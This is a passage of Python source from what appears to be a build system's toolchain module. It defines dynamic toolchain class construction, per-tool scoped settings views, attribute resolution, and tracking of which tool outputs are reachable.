True\n\t\t\t\t_classTrackr.paths[cls] = path\n\n\n\t\t\t_classTrackr.classes = ordered_set.OrderedSet(classes)\n\t\t\t_classTrackr.activeClasses = ordered_set.OrderedSet(classes)\n\n\t\t\t# Set up a map of class to member variable dict\n\t\t\t# All member variables will be stored here instead of in the class's __dict__\n\t\t\t# This is what allows for both sharing of base class values, and separation of\n\t\t\t# derived class values that share the same name, so they don't overwrite each other\n\t\t\tclassValues = {cls : {} for cls in _classTrackr.classes | _classTrackr.bases}\n\n\t\t\twith perf_timer.PerfTimer(\"Template class construction\"):\n\t\t\t\t# Create a class so that we can call methods on that class\n\t\t\t\tclass LimitView(object):\n\t\t\t\t\t\"\"\"Represents a limited view into a toolchain\"\"\"\n\t\t\t\t\t# The constructor takes the list of tools to limit to - i.e., toolchain.Tool(SomeClass, OtherClass)\n\t\t\t\t\tdef __init__(self, obj, *tools):\n\t\t\t\t\t\tself.obj = obj\n\n\t\t\t\t\t\t# Ensure resolution order of these tools is the same as the classes themselves\n\t\t\t\t\t\tif len(tools) > 1:\n\t\t\t\t\t\t\tself.tools = ordered_set.OrderedSet()\n\t\t\t\t\t\t\tfor cls in classes:\n\t\t\t\t\t\t\t\tfor tool in tools:\n\t\t\t\t\t\t\t\t\tif cls == tool or issubclass(cls, tool):\n\t\t\t\t\t\t\t\t\t\tself.tools.add(tool)\n\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tif len(tools) == len(self.tools):\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.tools = ordered_set.OrderedSet(tools)\n\n\t\t\t\t\t# When asked for an attribute, set the class tracker's limit set and then retrieve the attribute\n\t\t\t\t\t# from the toolchain class (this class) that generated the LimitView. Resolution will be limited\n\t\t\t\t\t# to the tools provided above.\n\t\t\t\t\tdef __getattr__(self, item):\n\t\t\t\t\t\t_threadSafeClassTrackr.limit = self.tools\n\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tval = getattr(self.obj, item)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\t\t\t\t\t\t\traise\n\n\t\t\t\t\t\tdef _limit(*args, **kwargs):\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\treturn val(*args, **kwargs)\n\t\t\t\t\t\t\tfinally:\n\t\t\t\t\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\n\t\t\t\t\t\t_limit.__name__ = item\n\n\t\t\t\t\t\tif isinstance(val, (types.MethodType, types.FunctionType)):\n\t\t\t\t\t\t\treturn _limit\n\n\t\t\t\t\t\t_threadSafeClassTrackr.limit = ordered_set.OrderedSet()\n\t\t\t\t\t\treturn val\n\n\t\t\t\tclass ReadOnlySettingsView(object):\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tRepresents a read-only, class-scoped view into a project's settings dictionary.\n\t\t\t\t\t:param settingsDict: Settings\n\t\t\t\t\t:type settingsDict: dict\n\t\t\t\t\t\"\"\"\n\t\t\t\t\t# pylint: disable=invalid-name\n\t\t\t\t\t# Names here are to match dict interface\n\t\t\t\t\tdef __init__(self, settingsDict):\n\t\t\t\t\t\tself._settingsDict = settingsDict\n\n\t\t\t\t\tdef __getitem__(self, item):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet item from the dictionary\n\t\t\t\t\t\t:param item: the key to search for\n\t\t\t\t\t\t:type item: any\n\t\t\t\t\t\t:return: the item\n\t\t\t\t\t\t:rtype: any\n\t\t\t\t\t\t:return: Whatever was placed in the settings dictionary\n\t\t\t\t\t\t:rtype: any\n\t\t\t\t\t\t:raises KeyError: if the key is not present in the dictionary within the calling class's scope\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\tkey = \"{}!{}\".format(toolId, item)\n\t\t\t\t\t\t\tif key in self._settingsDict:\n\t\t\t\t\t\t\t\treturn self._settingsDict[key]\n\t\t\t\t\t\traise KeyError(item)\n\n\t\t\t\t\tdef items(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the key,value tuple pairs in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key, value in self._settingsDict.items():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield key.split(\"!\", 1)[1], value\n\n\t\t\t\t\tdef keys(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the keys in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key in self._settingsDict.keys():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield key.split(\"!\", 1)[1]\n\n\t\t\t\t\tdef __iter__(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the keys in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key in self._settingsDict.keys():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield key.split(\"!\", 1)[1]\n\n\t\t\t\t\tdef __contains__(self, item):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck if a key is in the dictionary\n\t\t\t\t\t\t:param item: key to check\n\t\t\t\t\t\t:type item: any\n\t\t\t\t\t\t:return: true if in, false otherwise\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\tkey = \"{}!{}\".format(toolId, item)\n\t\t\t\t\t\t\tif key in self._settingsDict:\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\treturn False\n\n\t\t\t\t\tdef get(self, item, default):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the item from the dict. If not present, return default\n\t\t\t\t\t\t:param item: Key to search for\n\t\t\t\t\t\t:type item: any\n\t\t\t\t\t\t:param default: default value to return\n\t\t\t\t\t\t:type default: any\n\t\t\t\t\t\t:return: the value, or default\n\t\t\t\t\t\t:rtype: any\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\tkey = \"{}!{}\".format(toolId, item)\n\t\t\t\t\t\t\tif key in self._settingsDict:\n\t\t\t\t\t\t\t\treturn self._settingsDict[key]\n\t\t\t\t\t\treturn default\n\n\t\t\t\t\tdef values(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tIterate the values in the dictionary\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor key, value in self._settingsDict.items():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tyield value\n\n\t\t\t\t\tdef __len__(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet number of items in the dictionary\n\t\t\t\t\t\t:return: count of items\n\t\t\t\t\t\t:rtype: int\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tlength = 0\n\t\t\t\t\t\tfor key in self._settingsDict.keys():\n\t\t\t\t\t\t\tfor toolId in currentToolId:\n\t\t\t\t\t\t\t\tif key.startswith(\"{}!\".format(toolId)):\n\t\t\t\t\t\t\t\t\tlength += 1\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\treturn length\n\n\t\t\t\tclass ToolchainTemplate(object):\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tTemplate class that provides the methods for the toolchain class.\n\t\t\t\t\tThis class is never instantiated, its methods are just copied to the dynamically-created toolchain class below\n\t\t\t\t\tThis is a hacky hack to get around the fact that python2 doesn't support the syntax\n\t\t\t\t\tclass Toolchain(*classes)\n\t\t\t\t\tto give the class dynamically-created base classes (which is required because they need to all share the\n\t\t\t\t\tsame, and type-appropriate, self object)\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tdef __init__(self):\n\t\t\t\t\t\tif runInit:\n\t\t\t\t\t\t\t# Initialize all dynamically created bases.\n\t\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\t\tactualStaticInitMethod = cls.__static_init__\n\t\t\t\t\t\t\t\tif hasattr(cls, \"__old_static_init__\") and cls.__old_static_init_owner__ is cls:\n\t\t\t\t\t\t\t\t\tactualStaticInitMethod = cls.__old_static_init__\n\t\t\t\t\t\t\t\tif actualStaticInitMethod not in staticInitsRun:\n\t\t\t\t\t\t\t\t\tcls.__static_init__()\n\t\t\t\t\t\t\t\twith Use(cls):\n\t\t\t\t\t\t\t\t\tcls.__init__(self, ReadOnlySettingsView(projectSettings))\n\t\t\t\t\t\t\t_threadSafeClassTrackr.lastClass = None\n\n\t\t\t\t\t\t\tfor base in _classTrackr.bases:\n\t\t\t\t\t\t\t\tbase.__init__ = base.__oldInit__\n\t\t\t\t\t\t\t\tdel base.__oldInit__\n\t\t\t\t\t\t\t\t#base.__static_init__ = base.__old_static_init__\n\t\t\t\t\t\t\t\t#del base.__old_static_init__\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType))\n\t\t\t\t\tdef Use(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tEnter a tool context, must be called before calling any functions that were directly pulled from the tool.\n\t\t\t\t\t\ti.e.,::\n\t\t\t\t\t\t\twith toolchain.Use(tool):\n\t\t\t\t\t\t\t\ttool.Run(toolchain, *args)\n\t\t\t\t\t\t:param tool: The tool context to enter\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t:returns: Context manager to be used with a 'with' statement\n\t\t\t\t\t\t:rtype: context manager\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn Use(tool)\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType))\n\t\t\t\t\tdef CreateReachability(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCreate reachability info for a tool as it's about to be used.\n\t\t\t\t\t\tThe tool does not have to actively be in the task queue, this should be called every time an input\n\t\t\t\t\t\tis assigned to a tool, whether it's being processed immediately or being marked as pending.\n\t\t\t\t\t\t:param tool: The tool to mark reachability for\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor output in tool.outputFiles:\n\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t_classTrackr.reachability[output] += 1\n\n\t\t\t\t\t\tfor otherTool in _classTrackr.paths[tool]:\n\t\t\t\t\t\t\tfor output in otherTool.outputFiles:\n\t\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t\t_classTrackr.reachability[output] += 1\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType))\n\t\t\t\t\tdef ReleaseReachability(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tReleases reachability info for a tool, marking one instance of the tool finished.\n\t\t\t\t\t\tNote that for group inputs, this should be released as many times as it was created (i.e., if every\n\t\t\t\t\t\tinput called CreateReachability, then it needs to also be released once per input)\n\t\t\t\t\t\t:param tool: The tool to release reachability for\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor output in tool.outputFiles:\n\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t_classTrackr.reachability[output] -= 1\n\t\t\t\t\t\t\tassert _classTrackr.reachability[output] >= 0, \"Cannot release reachability without creating it\"\n\n\t\t\t\t\t\tfor otherTool in _classTrackr.paths[tool]:\n\t\t\t\t\t\t\tfor output in otherTool.outputFiles:\n\t\t\t\t\t\t\t\t_classTrackr.reachability.setdefault(output, 0)\n\t\t\t\t\t\t\t\t_classTrackr.reachability[output] -= 1\n\t\t\t\t\t\t\t\tassert _classTrackr.reachability[output] >= 0, \"Cannot release reachability without creating it\"\n\n\t\t\t\t\tdef HasAnyReachability(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck if any builds have started that didn't finish, if anything at all is reachable.\n\t\t\t\t\t\t:return: True if reachable, False otherwise\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tfor val in _classTrackr.reachability.values():\n\t\t\t\t\t\t\tif val != 0:\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\treturn False\n\n\t\t\t\t\t@TypeChecked(extension=String)\n\t\t\t\t\tdef IsOutputActive(self, extension):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck whether an output of the given extension is capable of being generated.\n\t\t\t\t\t\t:param extension:\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:return: Whether or not the input is active\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.reachability.get(extension, 0) != 0\n\n\t\t\t\t\t@TypeChecked(tool=(_classType, _typeType), extension=String)\n\t\t\t\t\tdef CanCreateOutput(self, tool, extension):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tCheck whether a tool is capable of ever creating a given output, even indirectly through other tools\n\t\t\t\t\t\t:param tool: The tool to check\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t:param extension: The extension to check\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:return: Whether or not the tool can create that output\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tif extension in tool.outputFiles:\n\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\tfor otherTool in _classTrackr.paths[tool]:\n\t\t\t\t\t\t\tif extension in otherTool.outputFiles:\n\t\t\t\t\t\t\t\treturn True\n\t\t\t\t\t\treturn False\n\n\t\t\t\t\tdef GetAllTools(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the full list of tools in this toolchain\n\t\t\t\t\t\t:return: Tool list\n\t\t\t\t\t\t:rtype: ordered_set.OrderedSet\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.classes\n\n\t\t\t\t\tdef GetActiveTools(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the full list of active tools in this toolchain\n\t\t\t\t\t\t:return: Tool list\n\t\t\t\t\t\t:rtype: ordered_set.OrderedSet\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.activeClasses\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef DeactivateTool(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tRemove the specified tool from the active tool list. This is used internally when processing\n\t\t\t\t\t\tnull tools to ensure they don't get processed multiple times. You should NOT use this in a\n\t\t\t\t\t\tmakefile - instead, you should use RemoveTool\n\n\t\t\t\t\t\t:param tool: tool to remove\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\t_classTrackr.activeClasses.remove(tool)\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef IsToolActive(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tReturn whether or not the specified tool is active\n\n\t\t\t\t\t\t:param tool: tool to remove\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t:return: Whether or not the tool is active\n\t\t\t\t\t\t:rtype: bool\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn tool in _classTrackr.activeClasses\n\n\t\t\t\t\t@TypeChecked(extension=(String, type(None)), generatingTools=(set, type(None)))\n\t\t\t\t\tdef GetToolsFor(self, extension, generatingTools=None):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet all tools that take a given input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t\t\t\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:param generatingTools: The tools that generated this input\n\t\t\t\t\t\t:type generatingTools: set[class] or None\n\t\t\t\t\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\t\t\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\t\t\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\t\t\t\t\tfor ALL of that tool's group inputs.\n\t\t\t\t\t\t:rtype: ordered_set.OrderedSet[type]\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tret = ordered_set.OrderedSet()\n\t\t\t\t\t\tfor cls in _classTrackr.activeClasses:\n\t\t\t\t\t\t\tif generatingTools and cls in generatingTools:\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tif extension is None and cls.inputFiles is None:\n\t\t\t\t\t\t\t\tif cls.exclusive:\n\t\t\t\t\t\t\t\t\treturn ordered_set.OrderedSet([cls])\n\t\t\t\t\t\t\t\tret.add(cls)\n\t\t\t\t\t\t\telif cls.inputFiles is not None and extension in cls.inputFiles:\n\t\t\t\t\t\t\t\tif cls.exclusive:\n\t\t\t\t\t\t\t\t\treturn ordered_set.OrderedSet([cls])\n\t\t\t\t\t\t\t\tret.add(cls)\n\n\t\t\t\t\t\treturn ret\n\n\t\t\t\t\t@TypeChecked(extension=String, generatingTools=(set, type(None)))\n\t\t\t\t\tdef GetGroupToolsFor(self, extension, generatingTools=None):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet all tools that take a given group input. If any generatingTools are specified, they will be excluded from the result.\n\n\t\t\t\t\t\t:param extension: The extension of the file to be fed to the new tools\n\t\t\t\t\t\t:type extension: str, bytes\n\t\t\t\t\t\t:param generatingTools: The tools that generated this input\n\t\t\t\t\t\t:type generatingTools: set[class] or None\n\t\t\t\t\t\t:return: A set of all tools that can take this input as group or individual inputs.\n\t\t\t\t\t\t\tIt's up to the caller to inspect the object to determine which type of input to provide.\n\t\t\t\t\t\t\tIt's also up to the caller to not call group input tools until IsOutputActive() returns False\n\t\t\t\t\t\t\tfor ALL of that tool's group inputs.\n\t\t\t\t\t\t:rtype: set[type]\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tret = ordered_set.OrderedSet()\n\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\tif generatingTools and cls in generatingTools:\n\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tfor dep in cls.dependencies:\n\t\t\t\t\t\t\t\tif self.IsOutputActive(dep):\n\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t\tif extension in cls.inputGroups:\n\t\t\t\t\t\t\t\tif cls.exclusive:\n\t\t\t\t\t\t\t\t\treturn ordered_set.OrderedSet([cls])\n\t\t\t\t\t\t\t\tret.add(cls)\n\n\t\t\t\t\t\treturn ret\n\n\t\t\t\t\t@TypeChecked(_return=set)\n\t\t\t\t\tdef GetSearchExtensions(self):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tReturn the full list of all extensions handled as inputs by any tool in the toolchain.\n\t\t\t\t\t\t:return: Set of all extensions\n\t\t\t\t\t\t:rtype: set[String]\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tret = set()\n\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\tif cls.inputFiles is not None:\n\t\t\t\t\t\t\t\tret |= cls.inputFiles\n\t\t\t\t\t\t\tret |= cls.inputGroups\n\t\t\t\t\t\treturn ret\n\n\n\t\t\t\t\tdef __setattr__(self, name, val):\n\t\t\t\t\t\tlastClass = _getLastClass()\n\t\t\t\t\t\tlimit = _getLimit()\n\t\t\t\t\t\tif not lastClass and len(limit) == 1:\n\t\t\t\t\t\t\tfor dummy in limit:\n\t\t\t\t\t\t\t\twith Use(dummy):\n\t\t\t\t\t\t\t\t\tsetattr(self, name, val)\n\t\t\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tassert lastClass is not None, \"Setting attributes is not supported on Toolchain instances. \" \\\n\t\t\t\t\t\t\t\"Use toolchain.Tool(FooTool) to limit to a single tool before setting attributes.\"\n\t\t\t\t\t\tif lastClass is self:\n\t\t\t\t\t\t\tobject.__setattr__(self, name, val)\n\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tcls = lastClass\n\n\t\t\t\t\t\t# Iterate all the base classes until we find one that's already set this value.\n\t\t\t\t\t\t# If we don't find one that's set this value, this value is being initialized and should\n\t\t\t\t\t\t# be placed within the scope of the class that's initializing it. That class and its children\n\t\t\t\t\t\t# will then be able to see it, but its bases and siblings (classes that share a common base)\n\t\t\t\t\t\t# will not.\n\t\t\t\t\t\tfor base in lastClass.mro():\n\t\t\t\t\t\t\tif base == ToolClass:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\tif name in classValues[base]:\n\t\t\t\t\t\t\t\tcls = base\n\t\t\t\t\t\tclassValues[cls][name] = val\n\n\t\t\t\t\tdef Tool(self, *args):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tObtain a LimitView object that allows functions to be run only on specific tools\n\n\t\t\t\t\t\t:param args: List of classes to limit function execution on\n\t\t\t\t\t\t:type args: class\n\t\t\t\t\t\t:return: limit view object\n\t\t\t\t\t\t:rtype: LimitView\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn LimitView(self, *args)\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef AddTool(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tAdd a new tool to the toolchain. This can only be used by a toolchain initialized with\n\t\t\t\t\t\trunInit = False to add that tool to the static method resolution; a toolchain initialized\n\t\t\t\t\t\twith runInit = True is finalized and cannot have new tools added to it\n\n\t\t\t\t\t\t:param tool: Class inheriting from Tool\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tassert not runInit, \"AddTool can't be called from this context\"\n\t\t\t\t\t\tassert tool not in _classTrackr.classes, \"Tool {} has already been added\".format(tool)\n\n\t\t\t\t\t\tfrom .. import currentPlan\n\t\t\t\t\t\tcurrentPlan.AddToSet(\"tools\", tool)\n\n\t\t\t\t\t\tfor base in cls.mro():\n\t\t\t\t\t\t\tif base is cls:\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\tif base is ToolClass:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t# Replace the base class's __init__ so we can track members properly\n\t\t\t\t\t\t\tif runInit:\n\t\t\t\t\t\t\t\t_setinit(base)\n\t\t\t\t\t\t\t_classTrackr.bases.add(base)\n\t\t\t\t\t\t\tclassValues.setdefault(base, {})\n\n\t\t\t\t\t\tclassValues[tool] = {}\n\n\t\t\t\t\t\t_classTrackr.classes.add(tool)\n\n\t\t\t\t\t\tif tool.supportedArchitectures is not None:\n\t\t\t\t\t\t\tshared_globals.allArchitectures.update(set(tool.supportedArchitectures))\n\n\t\t\t\t\t\tobject.__setattr__(self, \"__class__\", type(PlatformString(\"Toolchain\"), tuple(_classTrackr.classes), dict(ToolchainTemplate.__dict__)))\n\n\t\t\t\t\t@TypeChecked(tool=(_typeType, _classType))\n\t\t\t\t\tdef RemoveTool(self, tool):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tRemoves a tool from the toolchain. This can be used in a makefile to remove tools within\n\t\t\t\t\t\tcertain contexts, such as on a specific platform, or to remove default tools, such as\n\t\t\t\t\t\tthe built-in C++ linker tools.\n\n\t\t\t\t\t\t:param tool: Class inheriting from Tool\n\t\t\t\t\t\t:type tool: type\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tassert not runInit, \"RemoveTool can't be called from this context\"\n\t\t\t\t\t\tassert tool in _classTrackr.classes, \"Tool {} has not been added\".format(tool)\n\n\t\t\t\t\t\tfrom .. import currentPlan\n\t\t\t\t\t\tcurrentPlan.AddToSet(\"disabledTools\", tool)\n\n\t\t\t\t\t\t_classTrackr.classes.remove(tool)\n\n\t\t\t\t\t\tobject.__setattr__(self, \"__class__\", type(PlatformString(\"Toolchain\"), tuple(_classTrackr.classes), dict(ToolchainTemplate.__dict__)))\n\n\n\t\t\t\t\t@TypeChecked(extension=String, checker=CompileChecker)\n\t\t\t\t\tdef AddChecker(self, extension, checker):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tAdd a compile checker for a given extension.\n\n\t\t\t\t\t\t:param extension: The extension this checker applies to\n\t\t\t\t\t\t:type extension: str\n\t\t\t\t\t\t:param checker: The CompileChecker instance to be used for files with this extension\n\t\t\t\t\t\t:type checker: CompileChecker\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tassert not runInit, \"AddChecker can't be called from this context\"\n\n\t\t\t\t\t\tfrom .. import currentPlan\n\t\t\t\t\t\tcurrentPlan.UpdateDict(\"checkers\", {extension: checker})\n\t\t\t\t\t\t_classTrackr.checkers[extension] = checker\n\n\t\t\t\t\t@TypeChecked(extension=String)\n\t\t\t\t\tdef GetChecker(self, extension):\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tGet the checker for a given extension. If none has been registered, returns a default CompileChecker instance\n\n\t\t\t\t\t\t:param extension: The extension to check\n\t\t\t\t\t\t:type extension: str\n\t\t\t\t\t\t:return: The checker to use\n\t\t\t\t\t\t:rtype: CompileChecker\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\treturn _classTrackr.checkers.get(extension, defaultChecker)\n\n\t\t\t\t\tdef __deepcopy__(self, memo):\n\t\t\t\t\t\tmemo[id(self)] = self\n\t\t\t\t\t\treturn self\n\n\t\t\t\t\tdef __getattribute__(self, name):\n\t\t\t\t\t\twith perf_timer.PerfTimer(\"Toolchain attribute resolution\"):\n\t\t\t\t\t\t\tif name[0] == \"$\":\n\t\t\t\t\t\t\t\tname = name[1:]\n\t\t\t\t\t\t\t\tfor cls in _classTrackr.classes | _classTrackr.bases:\n\t\t\t\t\t\t\t\t\tif cls.__name__ == name:\n\t\t\t\t\t\t\t\t\t\treturn self.Tool(cls)\n\t\t\t\t\t\t\t\traise AttributeError(\"The requested tool '{}' was not found in this toolchain.\".format(name))\n\n\t\t\t\t\t\t\tif hasattr(ToolchainTemplate, name):\n\t\t\t\t\t\t\t\t# Anything implemented in ToolchainTemplate has priority over things implemented elsewhere\n\t\t\t\t\t\t\t\t# Return these things as actions on the toolchain itself rather than on its tools.\n\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\n\t\t\t\t\t\t\tlastClass = _getLastClass()\n\t\t\t\t\t\t\tlimit = _getLimit()\n\t\t\t\t\t\t\tif len(limit) == 1 and shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t\t\t\t\t\tcls = list(limit)[0]\n\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\tsentinel = object()\n\t\t\t\t\t\t\t\t\tval = sentinel\n\t\t\t\t\t\t\t\t\tfor cls2 in cls.mro():\n\t\t\t\t\t\t\t\t\t\tif name in cls2.__dict__:\n\t\t\t\t\t\t\t\t\t\t\tval = cls2.__dict__[name]\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\tif not isinstance(val, (types.FunctionType, types.MethodType, property)):\n\t\t\t\t\t\t\t\t\t\tfor cls in _classTrackr.classes:\n\t\t\t\t\t\t\t\t\t\t\tif cls in shared_globals.allGeneratorTools:\n\t\t\t\t\t\t\t\t\t\t\t\tlimit.add(cls)\n\n\t\t\t\t\t\t\tif not lastClass and len(limit) == 1:\n\t\t\t\t\t\t\t\tfor dummy in limit:\n\t\t\t\t\t\t\t\t\twith Use(dummy):\n\t\t\t\t\t\t\t\t\t\treturn getattr(self, name)\n\n\t\t\t\t\t\t\tif lastClass:\n\t\t\t\t\t\t\t\t# If we only have one class to look at, we can shortcut a little bit.\n\t\t\t\t\t\t\t\t# Also we can give access to instance methods and instance data that we can't give access to with\n\t\t\t\t\t\t\t\t# multiple classes in view.\n\n\t\t\t\t\t\t\t\tif lastClass is self:\n\t\t\t\t\t\t\t\t\treturn object.__getattribute__(self, name)\n\n\t\t\t\t\t\t\t\t# Iterate the class's mro looking for the first one that has this name present for it.\n\t\t\t\t\t\t\t\t# This starts with the class itself and then goes through its bases\n\t\t\t\t\t\t\t\tfor cls in lastClass.mro():\n\t\t\t\t\t\t\t\t\tif cls == ToolClass:\n\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\tif name in classValues[cls]:\n\t\t\t\t\t\t\t\t\t\treturn classValues[cls][name]\n\n\t\t\t\t\t\t\t\t# If we didn't find it there, then look for it on the class itself\n\t\t\t\t\t\t\t\t# This is either a function, method, or static variable, not an instance variable.\n\t\t\t\t\t\t\t\t# Would love to guarantee this is a function...\n\t\t\t\t\t\t\t\t# But for some reason python lets you access statics through self, so whatever...\n\t\t\t\t\t\t\t\tcls = lastClass\n\t\t\t\t\t\t\t\tif hasattr(cls, name):\n\t\t\t\t\t\t\t\t\t# Have to use __dict__ instead of getattr() because otherwise we can't identify static methods\n\t\t\t\t\t\t\t\t\t# See http://stackoverflow.com/questions/14187973/python3-check-if-method-is-static\n\t\t\t\t\t\t\t\t\tsentinel = object()\n\t\t\t\t\t\t\t\t\tval = 